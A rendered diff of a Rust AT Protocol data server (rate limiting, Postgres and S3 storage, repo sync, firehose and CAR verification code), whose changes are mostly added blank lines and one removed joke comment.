let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(1).unwrap()));
242
+
216
243
assert!(limiter.check_key(&"ip1".to_string()).is_ok());
217
244
assert!(limiter.check_key(&"ip1".to_string()).is_err());
218
245
assert!(limiter.check_key(&"ip2".to_string()).is_ok());
219
246
}
247
+
220
248
#[test]
221
249
fn test_builder_pattern() {
222
250
let limiters = RateLimiters::new()
···
224
252
.with_oauth_token_limit(60)
225
253
.with_password_reset_limit(3)
226
254
.with_account_creation_limit(5);
255
+
227
256
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
228
257
}
229
258
}
+9
src/repo/mod.rs
+9
src/repo/mod.rs
···
6
6
use multihash::Multihash;
7
7
use sha2::{Digest, Sha256};
8
8
use sqlx::PgPool;
9
+
9
10
pub mod tracking;
11
+
10
12
#[derive(Clone)]
11
13
pub struct PostgresBlockStore {
12
14
pool: PgPool,
13
15
}
16
+
14
17
impl PostgresBlockStore {
15
18
pub fn new(pool: PgPool) -> Self {
16
19
Self { pool }
17
20
}
18
21
}
22
+
19
23
impl BlockStore for PostgresBlockStore {
20
24
async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> {
21
25
crate::metrics::record_block_operation("get");
···
29
33
None => Ok(None),
30
34
}
31
35
}
36
+
32
37
async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> {
33
38
crate::metrics::record_block_operation("put");
34
39
let mut hasher = Sha256::new();
···
44
49
.map_err(|e| RepoError::storage(e))?;
45
50
Ok(cid)
46
51
}
52
+
47
53
async fn has(&self, cid: &Cid) -> Result<bool, RepoError> {
48
54
crate::metrics::record_block_operation("has");
49
55
let cid_bytes = cid.to_bytes();
···
53
59
.map_err(|e| RepoError::storage(e))?;
54
60
Ok(row.is_some())
55
61
}
62
+
56
63
async fn put_many(
57
64
&self,
58
65
blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send,
···
78
85
.map_err(|e| RepoError::storage(e))?;
79
86
Ok(())
80
87
}
88
+
81
89
async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> {
82
90
if cids.is_empty() {
83
91
return Ok(Vec::new());
···
101
109
.collect();
102
110
Ok(results)
103
111
}
112
+
104
113
async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> {
105
114
self.put_many(commit.blocks).await?;
106
115
Ok(())
+11
src/repo/tracking.rs
+11
src/repo/tracking.rs
···
6
6
use jacquard_repo::storage::BlockStore;
7
7
use std::collections::HashSet;
8
8
use std::sync::{Arc, Mutex};
9
+
9
10
#[derive(Clone)]
10
11
pub struct TrackingBlockStore {
11
12
inner: PostgresBlockStore,
12
13
written_cids: Arc<Mutex<Vec<Cid>>>,
13
14
read_cids: Arc<Mutex<HashSet<Cid>>>,
14
15
}
16
+
15
17
impl TrackingBlockStore {
16
18
pub fn new(store: PostgresBlockStore) -> Self {
17
19
Self {
···
20
22
read_cids: Arc::new(Mutex::new(HashSet::new())),
21
23
}
22
24
}
25
+
23
26
pub fn get_written_cids(&self) -> Vec<Cid> {
24
27
match self.written_cids.lock() {
25
28
Ok(guard) => guard.clone(),
26
29
Err(poisoned) => poisoned.into_inner().clone(),
27
30
}
28
31
}
32
+
29
33
pub fn get_read_cids(&self) -> Vec<Cid> {
30
34
match self.read_cids.lock() {
31
35
Ok(guard) => guard.iter().cloned().collect(),
32
36
Err(poisoned) => poisoned.into_inner().iter().cloned().collect(),
33
37
}
34
38
}
39
+
35
40
pub fn get_all_relevant_cids(&self) -> Vec<Cid> {
36
41
let written = self.get_written_cids();
37
42
let read = self.get_read_cids();
···
40
45
all.into_iter().collect()
41
46
}
42
47
}
48
+
43
49
impl BlockStore for TrackingBlockStore {
44
50
async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> {
45
51
let result = self.inner.get(cid).await?;
···
51
57
}
52
58
Ok(result)
53
59
}
60
+
54
61
async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> {
55
62
let cid = self.inner.put(data).await?;
56
63
match self.written_cids.lock() {
···
59
66
}
60
67
Ok(cid)
61
68
}
69
+
62
70
async fn has(&self, cid: &Cid) -> Result<bool, RepoError> {
63
71
self.inner.has(cid).await
64
72
}
73
+
65
74
async fn put_many(
66
75
&self,
67
76
blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send,
···
75
84
}
76
85
Ok(())
77
86
}
87
+
78
88
async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> {
79
89
let results = self.inner.get_many(cids).await?;
80
90
for (cid, result) in cids.iter().zip(results.iter()) {
···
87
97
}
88
98
Ok(results)
89
99
}
100
+
90
101
async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> {
91
102
self.put_many(commit.blocks).await?;
92
103
Ok(())
+16
src/state.rs
+16
src/state.rs
···
8
8
use sqlx::PgPool;
9
9
use std::sync::Arc;
10
10
use tokio::sync::broadcast;
11
+
11
12
#[derive(Clone)]
12
13
pub struct AppState {
13
14
pub db: PgPool,
···
19
20
pub cache: Arc<dyn Cache>,
20
21
pub distributed_rate_limiter: Arc<dyn DistributedRateLimiter>,
21
22
}
23
+
22
24
pub enum RateLimitKind {
23
25
Login,
24
26
AccountCreation,
···
32
34
AppPassword,
33
35
EmailUpdate,
34
36
}
37
+
35
38
impl RateLimitKind {
36
39
fn key_prefix(&self) -> &'static str {
37
40
match self {
···
48
51
Self::EmailUpdate => "email_update",
49
52
}
50
53
}
54
+
51
55
fn limit_and_window_ms(&self) -> (u32, u64) {
52
56
match self {
53
57
Self::Login => (10, 60_000),
···
64
68
}
65
69
}
66
70
}
71
+
67
72
impl AppState {
68
73
pub async fn new(db: PgPool) -> Self {
69
74
AuthConfig::init();
75
+
70
76
let block_store = PostgresBlockStore::new(db.clone());
71
77
let blob_store = S3BlobStorage::new().await;
78
+
72
79
let firehose_buffer_size: usize = std::env::var("FIREHOSE_BUFFER_SIZE")
73
80
.ok()
74
81
.and_then(|v| v.parse().ok())
75
82
.unwrap_or(10000);
83
+
76
84
let (firehose_tx, _) = broadcast::channel(firehose_buffer_size);
77
85
let rate_limiters = Arc::new(RateLimiters::new());
78
86
let circuit_breakers = Arc::new(CircuitBreakers::new());
79
87
let (cache, distributed_rate_limiter) = create_cache().await;
88
+
80
89
Self {
81
90
db,
82
91
block_store,
···
88
97
distributed_rate_limiter,
89
98
}
90
99
}
100
+
91
101
pub fn with_rate_limiters(mut self, rate_limiters: RateLimiters) -> Self {
92
102
self.rate_limiters = Arc::new(rate_limiters);
93
103
self
94
104
}
105
+
95
106
pub fn with_circuit_breakers(mut self, circuit_breakers: CircuitBreakers) -> Self {
96
107
self.circuit_breakers = Arc::new(circuit_breakers);
97
108
self
98
109
}
110
+
99
111
pub async fn check_rate_limit(&self, kind: RateLimitKind, client_ip: &str) -> bool {
100
112
if std::env::var("DISABLE_RATE_LIMITING").is_ok() {
101
113
return true;
102
114
}
115
+
103
116
let key = format!("{}:{}", kind.key_prefix(), client_ip);
104
117
let limiter_name = kind.key_prefix();
105
118
let (limit, window_ms) = kind.limit_and_window_ms();
119
+
106
120
if !self.distributed_rate_limiter.check_rate_limit(&key, limit, window_ms).await {
107
121
crate::metrics::record_rate_limit_rejection(limiter_name);
108
122
return false;
109
123
}
124
+
110
125
let limiter = match kind {
111
126
RateLimitKind::Login => &self.rate_limiters.login,
112
127
RateLimitKind::AccountCreation => &self.rate_limiters.account_creation,
···
120
135
RateLimitKind::AppPassword => &self.rate_limiters.app_password,
121
136
RateLimitKind::EmailUpdate => &self.rate_limiters.email_update,
122
137
};
138
+
123
139
let ok = limiter.check_key(&client_ip.to_string()).is_ok();
124
140
if !ok {
125
141
crate::metrics::record_rate_limit_rejection(limiter_name);
+19
-1
src/storage/mod.rs
+19
-1
src/storage/mod.rs
···
5
5
use aws_sdk_s3::primitives::ByteStream;
6
6
use bytes::Bytes;
7
7
use thiserror::Error;
8
+
8
9
#[derive(Error, Debug)]
9
10
pub enum StorageError {
10
11
#[error("IO error: {0}")]
···
14
15
#[error("Other: {0}")]
15
16
Other(String),
16
17
}
18
+
17
19
#[async_trait]
18
20
pub trait BlobStorage: Send + Sync {
19
21
async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError>;
···
22
24
async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError>;
23
25
async fn delete(&self, key: &str) -> Result<(), StorageError>;
24
26
}
27
+
25
28
pub struct S3BlobStorage {
26
29
client: Client,
27
30
bucket: String,
28
31
}
32
+
29
33
impl S3BlobStorage {
30
34
pub async fn new() -> Self {
31
-
// heheheh
32
35
let region_provider = RegionProviderChain::default_provider().or_else("us-east-1");
36
+
33
37
let config = aws_config::defaults(BehaviorVersion::latest())
34
38
.region(region_provider)
35
39
.load()
36
40
.await;
41
+
37
42
let bucket = std::env::var("S3_BUCKET").expect("S3_BUCKET must be set");
43
+
38
44
let client = if let Ok(endpoint) = std::env::var("S3_ENDPOINT") {
39
45
let s3_config = aws_sdk_s3::config::Builder::from(&config)
40
46
.endpoint_url(endpoint)
···
44
50
} else {
45
51
Client::new(&config)
46
52
};
53
+
47
54
Self { client, bucket }
48
55
}
49
56
}
57
+
50
58
#[async_trait]
51
59
impl BlobStorage for S3BlobStorage {
52
60
async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError> {
53
61
self.put_bytes(key, Bytes::copy_from_slice(data)).await
54
62
}
63
+
55
64
async fn put_bytes(&self, key: &str, data: Bytes) -> Result<(), StorageError> {
56
65
let result = self.client
57
66
.put_object()
···
61
70
.send()
62
71
.await
63
72
.map_err(|e| StorageError::S3(e.to_string()));
73
+
64
74
match &result {
65
75
Ok(_) => crate::metrics::record_s3_operation("put", "success"),
66
76
Err(_) => crate::metrics::record_s3_operation("put", "error"),
67
77
}
78
+
68
79
result?;
69
80
Ok(())
70
81
}
82
+
71
83
async fn get(&self, key: &str) -> Result<Vec<u8>, StorageError> {
72
84
self.get_bytes(key).await.map(|b| b.to_vec())
73
85
}
86
+
74
87
async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError> {
75
88
let resp = self
76
89
.client
···
83
96
crate::metrics::record_s3_operation("get", "error");
84
97
StorageError::S3(e.to_string())
85
98
})?;
99
+
86
100
let data = resp
87
101
.body
88
102
.collect()
···
92
106
StorageError::S3(e.to_string())
93
107
})?
94
108
.into_bytes();
109
+
95
110
crate::metrics::record_s3_operation("get", "success");
96
111
Ok(data)
97
112
}
113
+
98
114
async fn delete(&self, key: &str) -> Result<(), StorageError> {
99
115
let result = self.client
100
116
.delete_object()
···
103
119
.send()
104
120
.await
105
121
.map_err(|e| StorageError::S3(e.to_string()));
122
+
106
123
match &result {
107
124
Ok(_) => crate::metrics::record_s3_operation("delete", "success"),
108
125
Err(_) => crate::metrics::record_s3_operation("delete", "error"),
109
126
}
127
+
110
128
result?;
111
129
Ok(())
112
130
}
+5
src/sync/blob.rs
+5
src/sync/blob.rs
···
10
10
use serde::{Deserialize, Serialize};
11
11
use serde_json::json;
12
12
use tracing::error;
13
+
13
14
#[derive(Deserialize)]
14
15
pub struct GetBlobParams {
15
16
pub did: String,
16
17
pub cid: String,
17
18
}
19
+
18
20
pub async fn get_blob(
19
21
State(state): State<AppState>,
20
22
Query(params): Query<GetBlobParams>,
···
94
96
}
95
97
}
96
98
}
99
+
97
100
#[derive(Deserialize)]
98
101
pub struct ListBlobsParams {
99
102
pub did: String,
···
101
104
pub limit: Option<i64>,
102
105
pub cursor: Option<String>,
103
106
}
107
+
104
108
#[derive(Serialize)]
105
109
pub struct ListBlobsOutput {
106
110
pub cursor: Option<String>,
107
111
pub cids: Vec<String>,
108
112
}
113
+
109
114
pub async fn list_blobs(
110
115
State(state): State<AppState>,
111
116
Query(params): Query<ListBlobsParams>,
+3
src/sync/car.rs
+3
src/sync/car.rs
···
1
1
use cid::Cid;
2
2
use iroh_car::CarHeader;
3
3
use std::io::Write;
4
+
4
5
pub fn write_varint<W: Write>(mut writer: W, mut value: u64) -> std::io::Result<()> {
5
6
loop {
6
7
let mut byte = (value & 0x7F) as u8;
···
15
16
}
16
17
Ok(())
17
18
}
19
+
18
20
pub fn ld_write<W: Write>(mut writer: W, data: &[u8]) -> std::io::Result<()> {
19
21
write_varint(&mut writer, data.len() as u64)?;
20
22
writer.write_all(data)?;
21
23
Ok(())
22
24
}
25
+
23
26
pub fn encode_car_header(root_cid: &Cid) -> Result<Vec<u8>, String> {
24
27
let header = CarHeader::new_v1(vec![root_cid.clone()]);
25
28
let header_cbor = header.encode().map_err(|e| format!("Failed to encode CAR header: {:?}", e))?;
+11
src/sync/commit.rs
+11
src/sync/commit.rs
···
12
12
use serde_json::json;
13
13
use std::str::FromStr;
14
14
use tracing::error;
15
+
15
16
async fn get_rev_from_commit(state: &AppState, cid_str: &str) -> Option<String> {
16
17
let cid = Cid::from_str(cid_str).ok()?;
17
18
let block = state.block_store.get(&cid).await.ok()??;
18
19
let commit = Commit::from_cbor(&block).ok()?;
19
20
Some(commit.rev().to_string())
20
21
}
22
+
21
23
#[derive(Deserialize)]
22
24
pub struct GetLatestCommitParams {
23
25
pub did: String,
24
26
}
27
+
25
28
#[derive(Serialize)]
26
29
pub struct GetLatestCommitOutput {
27
30
pub cid: String,
28
31
pub rev: String,
29
32
}
33
+
30
34
pub async fn get_latest_commit(
31
35
State(state): State<AppState>,
32
36
Query(params): Query<GetLatestCommitParams>,
···
78
82
}
79
83
}
80
84
}
85
+
81
86
#[derive(Deserialize)]
82
87
pub struct ListReposParams {
83
88
pub limit: Option<i64>,
84
89
pub cursor: Option<String>,
85
90
}
91
+
86
92
#[derive(Serialize)]
87
93
#[serde(rename_all = "camelCase")]
88
94
pub struct RepoInfo {
···
91
97
pub rev: String,
92
98
pub active: bool,
93
99
}
100
+
94
101
#[derive(Serialize)]
95
102
pub struct ListReposOutput {
96
103
pub cursor: Option<String>,
97
104
pub repos: Vec<RepoInfo>,
98
105
}
106
+
99
107
pub async fn list_repos(
100
108
State(state): State<AppState>,
101
109
Query(params): Query<ListReposParams>,
···
154
162
}
155
163
}
156
164
}
165
+
157
166
#[derive(Deserialize)]
158
167
pub struct GetRepoStatusParams {
159
168
pub did: String,
160
169
}
170
+
161
171
#[derive(Serialize)]
162
172
pub struct GetRepoStatusOutput {
163
173
pub did: String,
164
174
pub active: bool,
165
175
pub rev: Option<String>,
166
176
}
177
+
167
178
pub async fn get_repo_status(
168
179
State(state): State<AppState>,
169
180
Query(params): Query<GetRepoStatusParams>,
+4
src/sync/crawl.rs
+4
src/sync/crawl.rs
···
8
8
use serde::Deserialize;
9
9
use serde_json::json;
10
10
use tracing::info;
11
+
11
12
#[derive(Deserialize)]
12
13
pub struct NotifyOfUpdateParams {
13
14
pub hostname: String,
14
15
}
16
+
15
17
pub async fn notify_of_update(
16
18
State(_state): State<AppState>,
17
19
Query(params): Query<NotifyOfUpdateParams>,
···
19
21
info!("Received notifyOfUpdate from hostname: {}", params.hostname);
20
22
(StatusCode::OK, Json(json!({}))).into_response()
21
23
}
24
+
22
25
#[derive(Deserialize)]
23
26
pub struct RequestCrawlInput {
24
27
pub hostname: String,
25
28
}
29
+
26
30
pub async fn request_crawl(
27
31
State(_state): State<AppState>,
28
32
Json(input): Json<RequestCrawlInput>,
+7
src/sync/deprecated.rs
+7
src/sync/deprecated.rs
···
14
14
use std::io::Write;
15
15
use std::str::FromStr;
16
16
use tracing::error;
17
+
17
18
const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000;
19
+
18
20
#[derive(Deserialize)]
19
21
pub struct GetHeadParams {
20
22
pub did: String,
21
23
}
24
+
22
25
#[derive(Serialize)]
23
26
pub struct GetHeadOutput {
24
27
pub root: String,
25
28
}
29
+
26
30
pub async fn get_head(
27
31
State(state): State<AppState>,
28
32
Query(params): Query<GetHeadParams>,
···
63
67
}
64
68
}
65
69
}
70
+
66
71
#[derive(Deserialize)]
67
72
pub struct GetCheckoutParams {
68
73
pub did: String,
69
74
}
75
+
70
76
pub async fn get_checkout(
71
77
State(state): State<AppState>,
72
78
Query(params): Query<GetCheckoutParams>,
···
168
174
)
169
175
.into_response()
170
176
}
177
+
171
178
fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) {
172
179
match value {
173
180
Ipld::Link(cid) => {
+1
src/sync/firehose.rs
+1
src/sync/firehose.rs
+13
src/sync/frame.rs
+13
src/sync/frame.rs
···
2
2
use serde::{Deserialize, Serialize};
3
3
use std::str::FromStr;
4
4
use crate::sync::firehose::SequencedEvent;
5
+
5
6
#[derive(Debug, Serialize, Deserialize)]
6
7
pub struct FrameHeader {
7
8
pub op: i64,
8
9
pub t: String,
9
10
}
11
+
10
12
#[derive(Debug, Serialize, Deserialize)]
11
13
pub struct CommitFrame {
12
14
pub seq: i64,
···
25
27
#[serde(rename = "prevData", skip_serializing_if = "Option::is_none")]
26
28
pub prev_data: Option<Cid>,
27
29
}
30
+
28
31
#[derive(Debug, Clone, Serialize, Deserialize)]
29
32
struct JsonRepoOp {
30
33
action: String,
···
32
35
cid: Option<String>,
33
36
prev: Option<String>,
34
37
}
38
+
35
39
#[derive(Debug, Serialize, Deserialize)]
36
40
pub struct RepoOp {
37
41
pub action: String,
···
40
44
#[serde(skip_serializing_if = "Option::is_none")]
41
45
pub prev: Option<Cid>,
42
46
}
47
+
43
48
#[derive(Debug, Serialize, Deserialize)]
44
49
pub struct IdentityFrame {
45
50
pub did: String,
···
48
53
pub seq: i64,
49
54
pub time: String,
50
55
}
56
+
51
57
#[derive(Debug, Serialize, Deserialize)]
52
58
pub struct AccountFrame {
53
59
pub did: String,
···
57
63
pub seq: i64,
58
64
pub time: String,
59
65
}
66
+
60
67
#[derive(Debug, Serialize, Deserialize)]
61
68
pub struct SyncFrame {
62
69
pub did: String,
···
66
73
pub seq: i64,
67
74
pub time: String,
68
75
}
76
+
69
77
pub struct CommitFrameBuilder {
70
78
pub seq: i64,
71
79
pub did: String,
···
75
83
pub blobs: Vec<String>,
76
84
pub time: chrono::DateTime<chrono::Utc>,
77
85
}
86
+
78
87
impl CommitFrameBuilder {
79
88
pub fn build(self) -> Result<CommitFrame, &'static str> {
80
89
let commit_cid = Cid::from_str(&self.commit_cid_str)
···
109
118
})
110
119
}
111
120
}
121
+
112
122
fn placeholder_rev() -> String {
113
123
use jacquard::types::{integer::LimitedU32, string::Tid};
114
124
Tid::now(LimitedU32::MIN).to_string()
115
125
}
126
+
116
127
fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String {
117
128
dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string()
118
129
}
130
+
119
131
impl TryFrom<SequencedEvent> for CommitFrame {
120
132
type Error = &'static str;
133
+
121
134
fn try_from(event: SequencedEvent) -> Result<Self, Self::Error> {
122
135
let builder = CommitFrameBuilder {
123
136
seq: event.seq,
+15
src/sync/import.rs
+15
src/sync/import.rs
···
9
9
use thiserror::Error;
10
10
use tracing::debug;
11
11
use uuid::Uuid;
12
+
12
13
#[derive(Error, Debug)]
13
14
pub enum ImportError {
14
15
#[error("CAR parsing error: {0}")]
···
36
37
#[error("DID mismatch: CAR is for {car_did}, but authenticated as {auth_did}")]
37
38
DidMismatch { car_did: String, auth_did: String },
38
39
}
40
+
39
41
#[derive(Debug, Clone)]
40
42
pub struct BlobRef {
41
43
pub cid: String,
42
44
pub mime_type: Option<String>,
43
45
}
46
+
44
47
pub async fn parse_car(data: &[u8]) -> Result<(Cid, HashMap<Cid, Bytes>), ImportError> {
45
48
let cursor = Cursor::new(data);
46
49
let mut reader = CarReader::new(cursor)
···
61
64
}
62
65
Ok((root, blocks))
63
66
}
67
+
64
68
pub fn find_blob_refs_ipld(value: &Ipld, depth: usize) -> Vec<BlobRef> {
65
69
if depth > 32 {
66
70
return vec![];
···
91
95
_ => vec![],
92
96
}
93
97
}
98
+
94
99
pub fn find_blob_refs(value: &JsonValue, depth: usize) -> Vec<BlobRef> {
95
100
if depth > 32 {
96
101
return vec![];
···
124
129
_ => vec![],
125
130
}
126
131
}
132
+
127
133
pub fn extract_links(value: &Ipld, links: &mut Vec<Cid>) {
128
134
match value {
129
135
Ipld::Link(cid) => {
···
142
148
_ => {}
143
149
}
144
150
}
151
+
145
152
#[derive(Debug)]
146
153
pub struct ImportedRecord {
147
154
pub collection: String,
···
149
156
pub cid: Cid,
150
157
pub blob_refs: Vec<BlobRef>,
151
158
}
159
+
152
160
pub fn walk_mst(
153
161
blocks: &HashMap<Cid, Bytes>,
154
162
root_cid: &Cid,
···
219
227
}
220
228
Ok(records)
221
229
}
230
+
222
231
pub struct CommitInfo {
223
232
pub rev: Option<String>,
224
233
pub prev: Option<String>,
225
234
}
235
+
226
236
fn extract_commit_info(commit: &Ipld) -> Result<(Cid, CommitInfo), ImportError> {
227
237
let obj = match commit {
228
238
Ipld::Map(m) => m,
···
250
260
});
251
261
Ok((data_cid, CommitInfo { rev, prev }))
252
262
}
263
+
253
264
pub async fn apply_import(
254
265
db: &PgPool,
255
266
user_id: Uuid,
···
344
355
);
345
356
Ok(records)
346
357
}
358
+
347
359
#[cfg(test)]
348
360
mod tests {
349
361
use super::*;
362
+
350
363
#[test]
351
364
fn test_find_blob_refs() {
352
365
let record = serde_json::json!({
···
377
390
);
378
391
assert_eq!(blob_refs[0].mime_type, Some("image/jpeg".to_string()));
379
392
}
393
+
380
394
#[test]
381
395
fn test_find_blob_refs_no_blobs() {
382
396
let record = serde_json::json!({
···
386
400
let blob_refs = find_blob_refs(&record, 0);
387
401
assert!(blob_refs.is_empty());
388
402
}
403
+
389
404
#[test]
390
405
fn test_find_blob_refs_depth_limit() {
391
406
fn deeply_nested(depth: usize) -> JsonValue {
+3
src/sync/listener.rs
+3
src/sync/listener.rs
···
3
3
use sqlx::postgres::PgListener;
4
4
use std::sync::atomic::{AtomicI64, Ordering};
5
5
use tracing::{debug, error, info, warn};
6
+
6
7
static LAST_BROADCAST_SEQ: AtomicI64 = AtomicI64::new(0);
8
+
7
9
pub async fn start_sequencer_listener(state: AppState) {
8
10
let initial_seq = sqlx::query_scalar!("SELECT COALESCE(MAX(seq), 0) as max FROM repo_seq")
9
11
.fetch_one(&state.db)
···
22
24
}
23
25
});
24
26
}
27
+
25
28
async fn listen_loop(state: AppState) -> anyhow::Result<()> {
26
29
let mut listener = PgListener::connect_with(&state.db).await?;
27
30
listener.listen("repo_updates").await?;
+1
src/sync/mod.rs
+1
src/sync/mod.rs
+9
src/sync/repo.rs
+9
src/sync/repo.rs
···
14
14
use std::io::Write;
15
15
use std::str::FromStr;
16
16
use tracing::error;
17
+
17
18
const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000;
19
+
18
20
#[derive(Deserialize)]
19
21
pub struct GetBlocksQuery {
20
22
pub did: String,
21
23
pub cids: String,
22
24
}
25
+
23
26
pub async fn get_blocks(
24
27
State(state): State<AppState>,
25
28
Query(query): Query<GetBlocksQuery>,
···
81
84
)
82
85
.into_response()
83
86
}
87
+
84
88
#[derive(Deserialize)]
85
89
pub struct GetRepoQuery {
86
90
pub did: String,
87
91
pub since: Option<String>,
88
92
}
93
+
89
94
pub async fn get_repo(
90
95
State(state): State<AppState>,
91
96
Query(query): Query<GetRepoQuery>,
···
177
182
)
178
183
.into_response()
179
184
}
185
+
180
186
fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) {
181
187
match value {
182
188
Ipld::Link(cid) => {
···
195
201
_ => {}
196
202
}
197
203
}
204
+
198
205
#[derive(Deserialize)]
199
206
pub struct GetRecordQuery {
200
207
pub did: String,
201
208
pub collection: String,
202
209
pub rkey: String,
203
210
}
211
+
204
212
pub async fn get_record(
205
213
State(state): State<AppState>,
206
214
Query(query): Query<GetRecordQuery>,
···
209
217
use jacquard_repo::mst::Mst;
210
218
use std::collections::BTreeMap;
211
219
use std::sync::Arc;
220
+
212
221
let repo_row = sqlx::query!(
213
222
r#"
214
223
SELECT r.repo_root_cid
+8
src/sync/subscribe_repos.rs
+8
src/sync/subscribe_repos.rs
···
10
10
use std::sync::atomic::{AtomicUsize, Ordering};
11
11
use tokio::sync::broadcast::error::RecvError;
12
12
use tracing::{error, info, warn};
13
+
13
14
const BACKFILL_BATCH_SIZE: i64 = 1000;
15
+
14
16
static SUBSCRIBER_COUNT: AtomicUsize = AtomicUsize::new(0);
17
+
15
18
#[derive(Deserialize)]
16
19
pub struct SubscribeReposParams {
17
20
pub cursor: Option<i64>,
18
21
}
22
+
19
23
#[axum::debug_handler]
20
24
pub async fn subscribe_repos(
21
25
ws: WebSocketUpgrade,
···
24
28
) -> Response {
25
29
ws.on_upgrade(move |socket| handle_socket(socket, state, params))
26
30
}
31
+
27
32
async fn send_event(
28
33
socket: &mut WebSocket,
29
34
state: &AppState,
···
33
38
socket.send(Message::Binary(bytes.into())).await?;
34
39
Ok(())
35
40
}
41
+
36
42
pub fn get_subscriber_count() -> usize {
37
43
SUBSCRIBER_COUNT.load(Ordering::SeqCst)
38
44
}
45
+
39
46
async fn handle_socket(mut socket: WebSocket, state: AppState, params: SubscribeReposParams) {
40
47
let count = SUBSCRIBER_COUNT.fetch_add(1, Ordering::SeqCst) + 1;
41
48
crate::metrics::set_firehose_subscribers(count);
···
45
52
crate::metrics::set_firehose_subscribers(count);
46
53
info!(subscribers = count, "Firehose subscriber disconnected");
47
54
}
55
+
48
56
async fn handle_socket_inner(socket: &mut WebSocket, state: &AppState, params: SubscribeReposParams) -> Result<(), ()> {
49
57
if let Some(cursor) = params.cursor {
50
58
let mut current_cursor = cursor;
+10
src/sync/util.rs
+10
src/sync/util.rs
···
10
10
use std::io::Cursor;
11
11
use std::str::FromStr;
12
12
use tokio::io::AsyncWriteExt;
13
+
13
14
fn extract_rev_from_commit_bytes(commit_bytes: &[u8]) -> Option<String> {
14
15
Commit::from_cbor(commit_bytes).ok().map(|c| c.rev().to_string())
15
16
}
17
+
16
18
async fn write_car_blocks(
17
19
commit_cid: Cid,
18
20
commit_bytes: Option<Bytes>,
···
37
39
.map_err(|e| anyhow::anyhow!("flushing CAR buffer: {}", e))?;
38
40
Ok(buffer.into_inner())
39
41
}
42
+
40
43
fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String {
41
44
dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string()
42
45
}
46
+
43
47
fn format_identity_event(event: &SequencedEvent) -> Result<Vec<u8>, anyhow::Error> {
44
48
let frame = IdentityFrame {
45
49
did: event.did.clone(),
···
56
60
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
57
61
Ok(bytes)
58
62
}
63
+
59
64
fn format_account_event(event: &SequencedEvent) -> Result<Vec<u8>, anyhow::Error> {
60
65
let frame = AccountFrame {
61
66
did: event.did.clone(),
···
73
78
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
74
79
Ok(bytes)
75
80
}
81
+
76
82
async fn format_sync_event(
77
83
state: &AppState,
78
84
event: &SequencedEvent,
···
101
107
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
102
108
Ok(bytes)
103
109
}
110
+
104
111
pub async fn format_event_for_sending(
105
112
state: &AppState,
106
113
event: SequencedEvent,
···
168
175
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
169
176
Ok(bytes)
170
177
}
178
+
171
179
pub async fn prefetch_blocks_for_events(
172
180
state: &AppState,
173
181
events: &[SequencedEvent],
···
206
214
}
207
215
Ok(blocks_map)
208
216
}
217
+
209
218
fn format_sync_event_with_prefetched(
210
219
event: &SequencedEvent,
211
220
prefetched: &HashMap<Cid, Bytes>,
···
236
245
serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?;
237
246
Ok(bytes)
238
247
}
248
+
239
249
pub async fn format_event_with_prefetched_blocks(
240
250
event: SequencedEvent,
241
251
prefetched: &HashMap<Cid, Bytes>,
+13
src/sync/verify.rs
+13
src/sync/verify.rs
···
8
8
use std::collections::HashMap;
9
9
use thiserror::Error;
10
10
use tracing::{debug, warn};
11
+
11
12
#[derive(Error, Debug)]
12
13
pub enum VerifyError {
13
14
#[error("Invalid commit: {0}")]
···
30
31
#[error("Invalid CBOR: {0}")]
31
32
InvalidCbor(String),
32
33
}
34
+
33
35
pub struct CarVerifier {
34
36
http_client: Client,
35
37
}
38
+
36
39
impl Default for CarVerifier {
37
40
fn default() -> Self {
38
41
Self::new()
39
42
}
40
43
}
44
+
41
45
impl CarVerifier {
42
46
pub fn new() -> Self {
43
47
Self {
···
47
51
.unwrap_or_default(),
48
52
}
49
53
}
54
+
50
55
pub async fn verify_car(
51
56
&self,
52
57
expected_did: &str,
···
80
85
prev: commit.prev().cloned(),
81
86
})
82
87
}
88
+
83
89
async fn resolve_did_signing_key(&self, did: &str) -> Result<PublicKey<'static>, VerifyError> {
84
90
let did_doc = self.resolve_did_document(did).await?;
85
91
did_doc
···
87
93
.map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?
88
94
.ok_or(VerifyError::NoSigningKey)
89
95
}
96
+
90
97
async fn resolve_did_document(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> {
91
98
if did.starts_with("did:plc:") {
92
99
self.resolve_plc_did(did).await
···
99
106
)))
100
107
}
101
108
}
109
+
102
110
async fn resolve_plc_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> {
103
111
let plc_url = std::env::var("PLC_DIRECTORY_URL")
104
112
.unwrap_or_else(|_| "https://plc.directory".to_string());
···
123
131
.map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?;
124
132
Ok(doc.into_static())
125
133
}
134
+
126
135
async fn resolve_web_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> {
127
136
let domain = did
128
137
.strip_prefix("did:web:")
···
154
163
